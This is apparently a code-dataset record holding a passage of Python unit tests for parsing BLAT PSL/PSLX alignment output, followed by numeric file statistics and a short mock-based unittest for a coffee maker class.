        self.assertEqual([36], hsp.query_span_all)
        self.assertEqual([36], hsp.hit_span_all)
        self.assertEqual([(13, 49)], hsp.query_range_all)
        self.assertEqual([(120641740, 120641776)], hsp.hit_range_all)
        # first qresult, fifth hit
        hit = qresult[4]
        self.assertEqual('chr19', hit.id)
        self.assertEqual(59128983, hit.seq_len)
        self.assertEqual(3, len(hit.hsps))
        # first qresult, fifth hit, first hsp
        # (two-fragment alignment: one hit gap open spanning 134 bases)
        hsp = qresult[4].hsps[0]
        self.assertEqual(34, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(2, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(1, hsp.hit_gapopen_num)
        self.assertEqual(134, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(10, hsp.query_start)
        self.assertEqual(35483340, hsp.hit_start)
        self.assertEqual(46, hsp.query_end)
        self.assertEqual(35483510, hsp.hit_end)
        self.assertEqual(2, len(hsp))
        self.assertEqual([25, 11], hsp.query_span_all)
        self.assertEqual([25, 11], hsp.hit_span_all)
        self.assertEqual([(10, 35), (35, 46)], hsp.query_range_all)
        self.assertEqual([(35483340, 35483365), (35483499, 35483510)], hsp.hit_range_all)
        # first qresult, fifth hit, second hsp
        hsp = qresult[4].hsps[1]
        self.assertEqual(39, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(10, hsp.query_start)
        self.assertEqual(54017130, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(54017169, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([39], hsp.query_span_all)
        self.assertEqual([39], hsp.hit_span_all)
        self.assertEqual([(10, 49)], hsp.query_range_all)
        self.assertEqual([(54017130, 54017169)], hsp.hit_range_all)
        # first qresult, fifth hit, third hsp
        hsp = qresult[4].hsps[2]
        self.assertEqual(36, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(3, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(10, hsp.query_start)
        self.assertEqual(553742, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(553781, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([39], hsp.query_span_all)
        self.assertEqual([39], hsp.hit_span_all)
        self.assertEqual([(10, 49)], hsp.query_range_all)
        self.assertEqual([(553742, 553781)], hsp.hit_range_all)
def test_psl_34_005(self, testf='psl_34_005.psl', pslx=False):
"""Test parsing blat output (psl_34_005.psl)"""
blat_file = get_file(testf)
self.qresults = list(parse(blat_file, FMT, pslx=pslx))
self.assertEqual(2, len(self.qresults))
# check common attributes
for qresult in self.qresults:
for hit in qresult:
self.assertEqual(qresult.id, hit.query_id)
for hsp in hit:
self.assertEqual(hit.id, hsp.hit_id)
self.assertEqual(qresult.id, hsp.query_id)
# test first qresult
qresult = self.qresults[0]
self.assertEqual('hg18_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(33, qresult.seq_len)
self.assertEqual(3, len(qresult))
# first qresult, first hit
hit = qresult[0]
self.assertEqual('chr4', hit.id)
self.assertEqual(191154276, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(16, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(61646095, hsp.hit_start)
self.assertEqual(27, hsp.query_end)
self.assertEqual(61646111, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([16], hsp.query_span_all)
self.assertEqual([16], hsp.hit_span_all)
self.assertEqual([(11, 27)], hsp.query_range_all)
self.assertEqual([(61646095, 61646111)], hsp.hit_range_all)
# first qresult, second hit
hit = qresult[1]
self.assertEqual('chr1', hit.id)
self.assertEqual(249250621, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(0, hsp.query_start)
self.assertEqual(10271783, hsp.hit_start)
self.assertEqual(33, hsp.query_end)
self.assertEqual(10271816, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([33], hsp.query_span_all)
self.assertEqual([33], hsp.hit_span_all)
self.assertEqual([(0, 33)], hsp.query_range_all)
self.assertEqual([(10271783, 10271816)], hsp.hit_range_all)
# first qresult, third hit
hit = qresult[2]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(17, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(53575980, hsp.hit_start)
self.assertEqual(25, hsp.query_end)
self.assertEqual(53575997, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([17], hsp.query_span_all)
self.assertEqual([17], hsp.hit_span_all)
self.assertEqual([(8, 25)], hsp.query_range_all)
self.assertEqual([(53575980, 53575997)], hsp.hit_range_all)
# test second qresult
qresult = self.qresults[1]
self.assertEqual('hg19_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(50, qresult.seq_len)
self.assertEqual(10, len(qresult))
# second qresult, first hit
hit = qresult[0]
self.assertEqual('chr9', hit.id)
self.assertEqual(141213431, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# second qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(38, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(9, hsp.query_start)
self.assertEqual(85737865, hsp.hit_start)
self.assertEqual(50, hsp.query_end)
self.assertEqual(85737906, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(9, 50)], hsp.query_range_all)
self.assertEqual([(85737865, 85737906)], hsp.hit_range_all)
# second qresult, second hit
hit = qresult[1]
self.assertEqual('chr8', hit.id)
self.assertEqual(146364022, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# second qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(41, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(95160479, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(95160520, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(8, 49)], hsp.query_range_all)
self.assertEqual([(95160479, 95160520)], hsp.hit_range_all)
# second qresult, third hit
hit = qresult[2]
self.assertEqual('chr22', hit.id)
self.assertEqual(51304566, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# second qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(42144400, hsp.hit_start)
self.assertEqual(47, hsp.query_end)
self.assertEqual(42144436, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(11, 47)], hsp.query_range_all)
self.assertEqual([(42144400, 42144436)], hsp.hit_range_all)
# second qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(12, hsp.query_start)
self.assertEqual(48997405, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(48997442, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([37], hsp.query_span_all)
self.assertEqual([37], hsp.hit_span_all)
self.assertEqual([(12, 49)], hsp.query_range_all)
self.assertEqual([(48997405, 48997442)], hsp.hit_range_all)
# second qresult, fourth hit
hit = qresult[3]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# second qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual(43, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(1, hsp.query_gapopen_num)
self.assertEqual(4, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(1, hsp.query_start)
self.assertEqual(183925984, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(183926028, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([6, 38], hsp.query_span_all)
self.assertEqual([6, 38], hsp.hit_span_all)
self.assertEqual([(1, 7), (11, 49)], hsp.query_range_all)
self.assertEqual([(183925984, 183925990), (183925990, 183926028)], hsp.hit_range_all)
# second qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(13, hsp.query_start)
self.assertEqual(120641740, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(120641776, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(13, 49)], hsp.query_range_all)
self.assertEqual([(120641740, 120641776)], hsp.hit_range_all)
# second qresult, fifth hit
hit = qresult[4]
self.assertEqual('chr19', hit.id)
self.assertEqual(59128983, hit.seq_len)
self.assertEqual(3, len(hit.hsps))
# second qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual(34, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(1, hsp.hit_gapopen_num)
self.assertEqual(134, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(35483340, hsp.hit_start)
self.assertEqual(46, hsp.query_end)
self.assertEqual(35483510, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([25, 11], hsp.query_span_all)
self.assertEqual([25, 11], hsp.hit_span_all)
self.assertEqual([(10, 35), (35, 46)], hsp.query_range_all)
self.assertEqual([(35483340, 35483365), (35483499, 35483510)], hsp.hit_range_all)
# second qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual(39, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(54017130, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(54017169, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(54017130, 54017169)], hsp.hit_range_all)
# second qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual(36, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(553742, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(553781, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(553742, 553781)], hsp.hit_range_all)
class BlatPslxCases(BlatPslCases):
    """Tests for parsing BLAT pslx output.

    pslx is psl plus two trailing columns holding the aligned query and hit
    sequences, so each test first re-runs the corresponding plain-psl
    assertions from BlatPslCases and then checks only the sequence strings.
    """

    def _check_pslx_seqs_common1(self, qresult):
        """Check query/hit sequences of the 3-hit qresult shared by several pslx files."""
        # hit 0, hsp 0 — identical query and hit fragments
        hsp = qresult[0].hsps[0]
        self.assertEqual('aggtaaactgccttca', str(hsp.query_all[0].seq))
        self.assertEqual('aggtaaactgccttca', str(hsp.hit_all[0].seq))
        # hit 1, hsp 0
        hsp = qresult[1].hsps[0]
        self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.query_all[0].seq))
        self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.hit_all[0].seq))
        # hit 2, hsp 0
        hsp = qresult[2].hsps[0]
        self.assertEqual('aaggcagtttaccttgg', str(hsp.query_all[0].seq))
        self.assertEqual('aaggcagtttaccttgg', str(hsp.hit_all[0].seq))

    def _check_pslx_seqs_common2(self, qresult):
        """Check query/hit sequences of the 5-hit qresult shared by several pslx files."""
        # hit 0, hsp 0 — mismatching positions between query and hit
        hsp = qresult[0].hsps[0]
        self.assertEqual('acaaaggggctgggcgtggtggctcacacctgtaatcccaa', str(hsp.query_all[0].seq))
        self.assertEqual('acaaaggggctgggcgcagtggctcacgcctgtaatcccaa', str(hsp.hit_all[0].seq))
        # hit 1, hsp 0
        hsp = qresult[1].hsps[0]
        self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[0].seq))
        self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.hit_all[0].seq))
        # hit 2, hsp 0
        hsp = qresult[2].hsps[0]
        self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatcc', str(hsp.query_all[0].seq))
        self.assertEqual('aaaggggctgggcgtggtagctcatgcctgtaatcc', str(hsp.hit_all[0].seq))
        # hit 2, hsp 1
        hsp = qresult[2].hsps[1]
        self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctt', str(hsp.query_all[0].seq))
        self.assertEqual('tgggattacaggcgggagccaccacgcccagcccctt', str(hsp.hit_all[0].seq))
        # hit 3, hsp 0 — two aligned fragments
        hsp = qresult[3].hsps[0]
        self.assertEqual('aaaaat', str(hsp.query_all[0].seq))
        self.assertEqual('aaaaat', str(hsp.hit_all[0].seq))
        self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[1].seq))
        self.assertEqual('aaaggggctgggcgtggtggctcacgcctgtaatccca', str(hsp.hit_all[1].seq))
        # hit 3, hsp 1
        hsp = qresult[3].hsps[1]
        self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccct', str(hsp.query_all[0].seq))
        self.assertEqual('tgggattacaggcgtgagccaccacgcccagcccct', str(hsp.hit_all[0].seq))
        # hit 4, hsp 0 — two aligned fragments
        hsp = qresult[4].hsps[0]
        self.assertEqual('caaaggggctgggcgtggtggctca', str(hsp.query_all[0].seq))
        self.assertEqual('caaaggggctgggcgtagtggctga', str(hsp.hit_all[0].seq))
        self.assertEqual('cacctgtaatc', str(hsp.query_all[1].seq))
        self.assertEqual('cacctgtaatc', str(hsp.hit_all[1].seq))
        # hit 4, hsp 1
        hsp = qresult[4].hsps[1]
        self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
        self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
        # hit 4, hsp 2
        hsp = qresult[4].hsps[2]
        self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
        self.assertEqual('tgggatgacaggggtgaggcaccacgcccagcccctttg', str(hsp.hit_all[0].seq))

    def test_pslx_34_001(self, testf='pslx_34_001.pslx'):
        """Test parsing blat output (pslx_34_001.pslx)"""
        # Re-run the psl column checks on the pslx file (was: testf ignored,
        # filename hard-coded again), then verify the sequence columns.
        BlatPslCases.test_psl_34_001(self, testf, pslx=True)
        self._check_pslx_seqs_common1(self.qresults[0])
        self._check_pslx_seqs_common2(self.qresults[1])

    def test_pslx_34_002(self, testf='pslx_34_002.pslx'):
        """Test parsing blat output (pslx_34_002.pslx)"""
        # No hits in this file, so only the psl column checks apply.
        BlatPslCases.test_psl_34_002(self, testf, pslx=True)

    def test_pslx_34_003(self, testf='pslx_34_003.pslx'):
        """Test parsing blat output (pslx_34_003.pslx)"""
        BlatPslCases.test_psl_34_003(self, testf, pslx=True)
        # Single qresult with the 3-hit sequence set.
        self._check_pslx_seqs_common1(self.qresults[0])

    def test_pslx_34_004(self, testf='pslx_34_004.pslx'):
        """Test parsing blat output (pslx_34_004.pslx)"""
        BlatPslCases.test_psl_34_004(self, testf, pslx=True)
        # Single qresult with the 5-hit sequence set.
        self._check_pslx_seqs_common2(self.qresults[0])

    def test_pslx_34_005(self, testf='pslx_34_005.pslx'):
        """Test parsing blat output (pslx_34_005.pslx)"""
        BlatPslCases.test_psl_34_005(self, testf, pslx=True)
        # Both qresults present: 3-hit set first, 5-hit set second.
        self._check_pslx_seqs_common1(self.qresults[0])
        self._check_pslx_seqs_common2(self.qresults[1])
if __name__ == "__main__":
    # Verbose runner so each test name is printed as it executes.
    # (PEP 8: no spaces around '=' in keyword arguments.)
    runner = unittest.TextTestRunner(verbosity=2)
    unittest.main(testRunner=runner)
| 47.309991
| 96
| 0.656245
| 7,283
| 55,400
| 4.828505
| 0.029795
| 0.360433
| 0.147415
| 0.119945
| 0.972758
| 0.966701
| 0.966701
| 0.962293
| 0.961668
| 0.958426
| 0
| 0.067211
| 0.22009
| 55,400
| 1,170
| 97
| 47.350427
| 0.746685
| 0.079043
| 0
| 0.968191
| 0
| 0
| 0.057431
| 0.043073
| 0
| 0
| 0
| 0
| 0.83996
| 1
| 0.010934
| false
| 0
| 0.00497
| 0
| 0.018887
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1374143736abf1f0db6e8d4fc54b787cd914931b
| 2,592
|
py
|
Python
|
Mocking/CoffeeMaker/Python/test_integration_code.py
|
jamiemacdonald04/AutomatedTestCentral
|
6be2cdce4441e093a69b58f1931e76bdbdffdc14
|
[
"MIT"
] | null | null | null |
Mocking/CoffeeMaker/Python/test_integration_code.py
|
jamiemacdonald04/AutomatedTestCentral
|
6be2cdce4441e093a69b58f1931e76bdbdffdc14
|
[
"MIT"
] | null | null | null |
Mocking/CoffeeMaker/Python/test_integration_code.py
|
jamiemacdonald04/AutomatedTestCentral
|
6be2cdce4441e093a69b58f1931e76bdbdffdc14
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import MagicMock
from coffee_maker import *
from dry_beans_coffee import *
class TestCofeeSelect(unittest.TestCase):
    """Tests for CoffeeMaker driven through a mocked coffee selector.

    Each test configures a MagicMock standing in for AbstractCoffeeSelect,
    runs CoffeeMaker.making_coffee(), checks the brewed-message result, and
    verifies how the mock was called.
    """

    def _make_maker(self, beans, grind_ok):
        """Return (maker, mock) with get_beans/grind_beans pre-configured.

        beans -- value get_beans() will report.
        grind_ok -- whether grind_beans() reports success.
        """
        selector = MagicMock(AbstractCoffeeSelect)
        selector.get_beans.return_value = beans
        selector.grind_beans.return_value = grind_ok
        return CoffeeMaker(selector), selector

    def _assert_beans_queried_once(self, selector):
        """Assert get_beans was called exactly once, with no arguments."""
        # called with zero arguments
        selector.get_beans.assert_called_with()
        # was called once with zero arguments
        selector.get_beans.assert_called_once_with()
        # was it called at least once
        selector.get_beans.assert_called()
        # was called once only
        selector.get_beans.assert_called_once()

    def test_coffee_no_beans(self):
        """No beans available -> no coffee."""
        maker, selector = self._make_maker(beans=0, grind_ok=False)
        coffee = maker.making_coffee()
        # self.assertEqual instead of bare assert: survives `python -O`
        # and gives a useful failure message.
        self.assertEqual("No coffee available", coffee)
        self._assert_beans_queried_once(selector)

    def test_grind_failure(self):
        """Beans present but grinding fails -> no ground coffee."""
        maker, selector = self._make_maker(beans=1, grind_ok=False)
        coffee = maker.making_coffee()
        self.assertEqual("No ground coffee available", coffee)
        self._assert_beans_queried_once(selector)
        selector.grind_beans.assert_called_once()

    def test_the_sweat_taste_of_coffee(self):
        """Happy path: beans present and grinding succeeds -> coffee brewed."""
        beans = 4
        maker, selector = self._make_maker(beans=beans, grind_ok=True)
        coffee = maker.making_coffee()
        self.assertEqual(
            "Coffee has now been brewed with {} beans".format(beans), coffee)
        self._assert_beans_queried_once(selector)
        selector.grind_beans.assert_called_once()
if __name__ == "__main__":
    # Allow running this test module directly as a script.
    unittest.main()
| 36.507042
| 81
| 0.716821
| 330
| 2,592
| 5.236364
| 0.166667
| 0.180556
| 0.240741
| 0.164931
| 0.84375
| 0.84375
| 0.835648
| 0.814236
| 0.814236
| 0.814236
| 0
| 0.001488
| 0.222222
| 2,592
| 70
| 82
| 37.028571
| 0.855655
| 0.129244
| 0
| 0.581395
| 0
| 0
| 0.041444
| 0
| 0
| 0
| 0
| 0
| 0.395349
| 1
| 0.069767
| false
| 0
| 0.093023
| 0
| 0.186047
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.